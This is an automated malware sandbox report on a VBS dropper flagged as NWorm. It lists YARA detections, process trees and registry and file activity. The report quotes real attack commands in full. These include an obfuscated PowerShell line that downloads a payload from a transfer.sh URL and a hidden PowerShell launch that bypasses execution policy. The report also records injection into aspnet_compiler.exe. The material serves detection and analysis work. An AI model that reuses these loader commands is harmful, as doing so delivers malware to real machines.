Source: 11.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 11.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 11.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 11.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 10.2.powershell.exe.1a640e0e328.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.powershell.exe.1a640e0e328.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 11.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 11.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 11.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 11.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 10.2.powershell.exe.1a640e0e328.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 10.2.powershell.exe.1a640c386a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 10.2.powershell.exe.1a640da2068.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000002.00000002.945992351.000001EE646CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000002.00000002.953420708.000001EE7C619000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000002.00000002.947928671.000001EE64A74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000002.00000002.951681461.000001EE654E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 0000000B.00000000.527798017.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000002.00000002.951692197.000001EE654E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 0000000A.00000002.943052838.000001A63E9D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 0000000B.00000000.527148888.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000B.00000002.942336968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000002.00000002.952998329.000001EE745BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 0000000B.00000000.527508335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD\ICPDRCYNSQCDVKBIWIFZCD.bat, type: DROPPED	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF9ECE71D70	2_2_00007FF9ECE71D70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9ECE80D7F	10_2_00007FF9ECE80D7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9ECE80D87	10_2_00007FF9ECE80D87
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9ECE80D30	10_2_00007FF9ECE80D30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9ECE80CD0	10_2_00007FF9ECE80CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9ECF52F29	10_2_00007FF9ECF52F29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_014872C8	11_2_014872C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0148BC48	11_2_0148BC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_01487F98	11_2_01487F98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_01486F80	11_2_01486F80

Source: YBAXAKQXVYWIXQJDE.VBS

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\YBAXAKQXVYWIXQJDE.VBS"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_l)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_o)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_a)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_d)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_',''),'67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-s67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-t67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-r67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-i67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-n67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-g67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-',''),'%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_e)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_b)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_C)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_l)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220308

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkiixbce.yg4.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winVBS@7/7@3/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\594274bc

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\YBAXAKQXVYWIXQJDE.VBS"

Source: 11.0.aspnet_compiler.exe.400000.4.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.0.aspnet_compiler.exe.400000.4.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 11.0.aspnet_compiler.exe.400000.2.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.0.aspnet_compiler.exe.400000.2.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 11.0.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.0.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Se", "Unsupported parameter type 00000001", "Unsupported parameter type 00000009", "Unsupported parameter type 00000000")

Yara detected NWorm

Source: Yara match	File source: 11.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1a640e0e328.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1a640e0e328.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1a640c386a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1a640da2068.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.527798017.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.527148888.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.942336968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.527508335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.944900247.000001A640AD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Suspicious powershell command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1			Jump to behavior

.NET source code contains potential unpacker

Source: 11.0.aspnet_compiler.exe.400000.4.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.aspnet_compiler.exe.400000.4.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.aspnet_compiler.exe.400000.2.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.aspnet_compiler.exe.400000.2.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.aspnet_compiler.exe.400000.3.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.aspnet_compiler.exe.400000.3.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.aspnet_compiler.exe.400000.1.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.aspnet_compiler.exe.400000.1.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Obfuscated command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_l)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_o)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_a)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_d)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_',''),'67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-s67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-t67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-r67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-i67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-n67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-g67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-',''),'%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' 